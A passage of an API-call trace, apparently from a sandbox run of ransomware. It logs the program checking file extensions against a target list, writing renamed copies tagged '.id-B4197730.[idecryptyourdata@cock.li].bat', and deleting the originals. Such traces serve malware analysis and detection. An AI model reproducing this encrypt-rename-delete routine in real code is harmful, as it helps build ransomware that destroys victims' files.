lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0046.953] WriteFile (in: hFile=0x300, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xf6, lpOverlapped=0x0) returned 1 [0046.953] SetEndOfFile (hFile=0x300) returned 1 [0046.953] CloseHandle (hObject=0x300) returned 1 [0046.955] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.955] SetEndOfFile (hFile=0x2c4) returned 1 [0046.957] CloseHandle (hObject=0x2c4) returned 1 [0046.957] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0046.957] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1033\\localizeddata.xml")) returned 1 [0046.958] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0046.958] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0046.958] lstrlenW (lpString=".doc") returned 4 [0046.958] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0046.958] lstrlenW (lpString=".docx") returned 5 [0046.958] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0046.958] lstrlenW (lpString=".pdf") returned 4 [0046.958] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0046.958] lstrlenW (lpString=".xls") returned 4 [0046.958] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0046.958] lstrlenW (lpString=".xlsx") returned 5 [0046.958] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0046.958] lstrlenW (lpString=".ppt") returned 4 [0046.958] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0046.958] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0046.958] lstrlenW (lpString=".zip") returned 4 [0046.958] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0046.958] lstrlenW (lpString=".rar") returned 4 [0046.958] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0046.958] lstrlenW (lpString=".bz2") returned 4 [0046.958] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0046.958] lstrlenW (lpString=".7z") returned 3 [0046.958] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0046.958] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0046.958] lstrlenW (lpString=".dbf") returned 4 [0046.958] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0046.958] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0046.959] lstrlenW (lpString=".1cd") returned 4 [0046.959] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0046.959] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0046.959] lstrlenW (lpString=".jpg") returned 4 [0046.959] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0046.959] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0046.959] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0046.959] lstrlenW (lpString=".doc") returned 4 [0046.959] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0046.959] lstrlenW (lpString=".docx") returned 5 [0046.959] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0046.959] lstrlenW (lpString=".pdf") returned 4 [0046.959] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0046.959] lstrlenW (lpString=".xls") returned 4 [0046.959] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0046.959] lstrlenW (lpString=".xlsx") returned 5 [0046.959] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0046.959] lstrlenW (lpString=".ppt") returned 4 [0046.959] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0046.959] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0046.959] lstrlenW (lpString=".zip") returned 4 [0046.959] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0046.959] lstrlenW (lpString=".rar") returned 4 [0046.959] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0046.959] lstrlenW (lpString=".bz2") returned 4 [0046.959] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0046.959] lstrlenW (lpString=".7z") returned 3 [0046.959] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0046.960] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0046.960] lstrlenW (lpString=".dbf") returned 4 [0046.960] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0046.960] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0046.960] lstrlenW (lpString=".1cd") returned 4 [0046.960] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0046.960] lstrlenW (lpString="C:\\588bce7c90097ed212\\1033\\LocalizedData.xml") returned 44 [0046.960] lstrlenW (lpString=".jpg") returned 4 [0046.960] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0046.960] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0046.960] lstrlenW (lpString="LocalizedData.xml") returned 17 [0046.960] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0046.960] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=77022) returned 1 [0046.960] CloseHandle (hObject=0x2c4) returned 1 [0046.960] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml")) returned 0x80 [0046.961] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0046.961] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0046.961] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.961] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0046.961] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0046.961] GetLastError () returned 0x0 [0046.961] ReadFile (in: hFile=0x2c4, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x12cde, lpOverlapped=0x0) returned 1 [0047.017] WriteFile (in: hFile=0x300, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x12ce0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x12ce0, lpOverlapped=0x0) returned 1 [0047.019] ReadFile (in: hFile=0x2c4, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.019] WriteFile (in: hFile=0x300, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.020] SetEndOfFile (hFile=0x300) returned 1 [0047.020] CloseHandle (hObject=0x300) returned 1 [0047.022] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.022] SetEndOfFile (hFile=0x2c4) returned 1 [0047.023] CloseHandle (hObject=0x2c4) returned 1 [0047.023] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.023] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml")) returned 1 [0047.024] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0047.024] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0047.024] lstrlenW (lpString=".doc") returned 4 [0047.024] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.024] lstrlenW (lpString=".docx") returned 5 [0047.024] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.024] lstrlenW (lpString=".pdf") returned 4 [0047.024] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.024] lstrlenW (lpString=".xls") returned 4 [0047.024] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.024] lstrlenW (lpString=".xlsx") returned 5 [0047.024] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.024] lstrlenW (lpString=".ppt") returned 4 [0047.024] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.024] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0047.024] lstrlenW (lpString=".zip") returned 4 [0047.024] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.024] lstrlenW (lpString=".rar") returned 4 [0047.024] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.024] lstrlenW (lpString=".bz2") returned 4 [0047.024] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.025] lstrlenW (lpString=".7z") returned 3 [0047.025] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.025] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0047.025] lstrlenW (lpString=".dbf") returned 4 [0047.025] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.025] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0047.025] lstrlenW (lpString=".1cd") returned 4 [0047.025] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.025] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0047.025] lstrlenW (lpString=".jpg") returned 4 [0047.025] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.025] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0047.025] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0047.025] lstrlenW (lpString=".doc") returned 4 [0047.025] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.025] lstrlenW (lpString=".docx") returned 5 [0047.025] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.025] lstrlenW (lpString=".pdf") returned 4 [0047.025] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.025] lstrlenW (lpString=".xls") returned 4 [0047.025] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.025] lstrlenW (lpString=".xlsx") returned 5 [0047.025] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.025] lstrlenW (lpString=".ppt") returned 4 [0047.025] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.025] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0047.025] lstrlenW (lpString=".zip") returned 4 [0047.025] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.026] lstrlenW (lpString=".rar") returned 4 [0047.026] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.026] lstrlenW (lpString=".bz2") returned 4 [0047.026] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.026] lstrlenW (lpString=".7z") returned 3 [0047.026] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.026] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0047.026] lstrlenW (lpString=".dbf") returned 4 [0047.026] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0047.026] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0047.026] lstrlenW (lpString=".1cd") returned 4 [0047.026] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0047.026] lstrlenW (lpString="C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned 44 [0047.026] lstrlenW (lpString=".jpg") returned 4 [0047.026] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0047.026] lstrcmpiW (lpString1=".rtf", lpString2=".bat") returned 1 [0047.027] lstrlenW (lpString="eula.rtf") returned 8 [0047.027] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.027] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=6851) returned 1 [0047.027] CloseHandle (hObject=0x2c4) returned 1 [0047.027] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf")) returned 0x80 [0047.027] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.027] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.027] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.027] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.027] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.028] GetLastError () returned 0x0 [0047.028] ReadFile (in: hFile=0x2c4, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x1ac3, lpOverlapped=0x0) returned 1 [0047.030] WriteFile (in: hFile=0x300, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x1ad0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x1ad0, lpOverlapped=0x0) returned 1 [0047.031] ReadFile (in: hFile=0x2c4, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.031] WriteFile (in: hFile=0x300, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xe4, lpOverlapped=0x0) returned 1 [0047.031] SetEndOfFile (hFile=0x300) returned 1 [0047.031] CloseHandle (hObject=0x300) returned 1 [0047.032] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.032] SetEndOfFile (hFile=0x2c4) returned 1 [0047.033] CloseHandle (hObject=0x2c4) returned 1 [0047.033] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.033] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf")) returned 1 [0047.034] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0047.034] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0047.034] lstrlenW (lpString=".doc") returned 4 [0047.034] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.034] lstrlenW (lpString=".docx") returned 5 [0047.034] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.034] lstrlenW (lpString=".pdf") returned 4 [0047.034] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.034] lstrlenW (lpString=".xls") returned 4 [0047.034] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.034] lstrlenW (lpString=".xlsx") returned 5 [0047.034] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.034] lstrlenW (lpString=".ppt") returned 4 [0047.034] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.034] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0047.034] lstrlenW (lpString=".zip") returned 4 [0047.034] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.034] lstrlenW (lpString=".rar") returned 4 [0047.034] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.034] lstrlenW (lpString=".bz2") returned 4 [0047.034] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.034] lstrlenW (lpString=".7z") returned 3 [0047.034] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.034] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0047.034] lstrlenW (lpString=".dbf") returned 4 [0047.035] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.035] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0047.035] lstrlenW (lpString=".1cd") returned 4 [0047.035] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.035] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0047.035] lstrlenW (lpString=".jpg") returned 4 [0047.035] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.035] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0047.035] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0047.035] lstrlenW (lpString=".doc") returned 4 [0047.035] lstrcmpiW (lpString1=".doc", lpString2=".rtf") returned -1 [0047.035] lstrlenW (lpString=".docx") returned 5 [0047.035] lstrcmpiW (lpString1=".docx", lpString2="a.rtf") returned -1 [0047.035] lstrlenW (lpString=".pdf") returned 4 [0047.035] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0047.035] lstrlenW (lpString=".xls") returned 4 [0047.035] lstrcmpiW (lpString1=".xls", lpString2=".rtf") returned 1 [0047.035] lstrlenW (lpString=".xlsx") returned 5 [0047.035] lstrcmpiW (lpString1=".xlsx", lpString2="a.rtf") returned -1 [0047.035] lstrlenW (lpString=".ppt") returned 4 [0047.035] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0047.035] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0047.035] lstrlenW (lpString=".zip") returned 4 [0047.035] lstrcmpiW (lpString1=".zip", lpString2=".rtf") returned 1 [0047.035] lstrlenW (lpString=".rar") returned 4 [0047.035] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0047.035] lstrlenW (lpString=".bz2") returned 4 [0047.035] lstrcmpiW (lpString1=".bz2", lpString2=".rtf") returned -1 [0047.036] lstrlenW (lpString=".7z") returned 3 [0047.036] lstrcmpiW (lpString1=".7z", lpString2="rtf") returned -1 [0047.036] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0047.036] lstrlenW (lpString=".dbf") returned 4 [0047.036] lstrcmpiW (lpString1=".dbf", lpString2=".rtf") returned -1 [0047.036] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0047.036] lstrlenW (lpString=".1cd") returned 4 [0047.036] lstrcmpiW (lpString1=".1cd", lpString2=".rtf") returned -1 [0047.036] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\eula.rtf") returned 35 [0047.036] lstrlenW (lpString=".jpg") returned 4 [0047.036] lstrcmpiW (lpString1=".jpg", lpString2=".rtf") returned -1 [0047.036] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0047.036] lstrlenW (lpString="LocalizedData.xml") returned 17 [0047.036] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.050] GetFileSizeEx (in: hFile=0x2c4, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=72076) returned 1 [0047.050] CloseHandle (hObject=0x2c4) returned 1 [0047.051] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml")) returned 0x80 [0047.051] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0047.051] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0047.052] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.052] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.052] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0047.052] GetLastError () returned 0x0 [0047.052] ReadFile (in: hFile=0x2c4, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x1198c, lpOverlapped=0x0) returned 1 [0047.106] WriteFile (in: hFile=0x300, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x11990, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x11990, lpOverlapped=0x0) returned 1 [0047.108] ReadFile (in: hFile=0x2c4, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0047.108] WriteFile (in: hFile=0x300, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xf6, lpOverlapped=0x0) returned 1 [0047.108] SetEndOfFile (hFile=0x300) returned 1 [0047.108] CloseHandle (hObject=0x300) returned 1 [0047.110] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0047.110] SetEndOfFile (hFile=0x2c4) returned 1 [0047.111] CloseHandle (hObject=0x2c4) returned 1 [0047.112] SetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x80) returned 1 [0047.112] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml")) returned 1 [0047.112] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0047.112] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0047.112] lstrlenW (lpString=".doc") returned 4 [0047.112] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0047.112] lstrlenW (lpString=".docx") returned 5 [0047.112] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1 [0047.112] lstrlenW (lpString=".pdf") returned 4 [0047.112] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0047.112] lstrlenW (lpString=".xls") returned 4 [0047.113] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0047.113] lstrlenW (lpString=".xlsx") returned 5 [0047.113] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1 [0047.113] lstrlenW (lpString=".ppt") returned 4 [0047.113] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0047.113] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0047.113] lstrlenW (lpString=".zip") returned 4 [0047.113] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0047.113] lstrlenW (lpString=".rar") returned 4 [0047.113] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0047.113] lstrlenW (lpString=".bz2") returned 4 [0047.113] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0047.113] lstrlenW (lpString=".7z") returned 3 [0047.113] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0047.113] lstrlenW (lpString="C:\\588bce7c90097ed212\\1037\\LocalizedData.xml") returned 44 [0047.113] lstrlenW (lpString=".dbf") returned 4 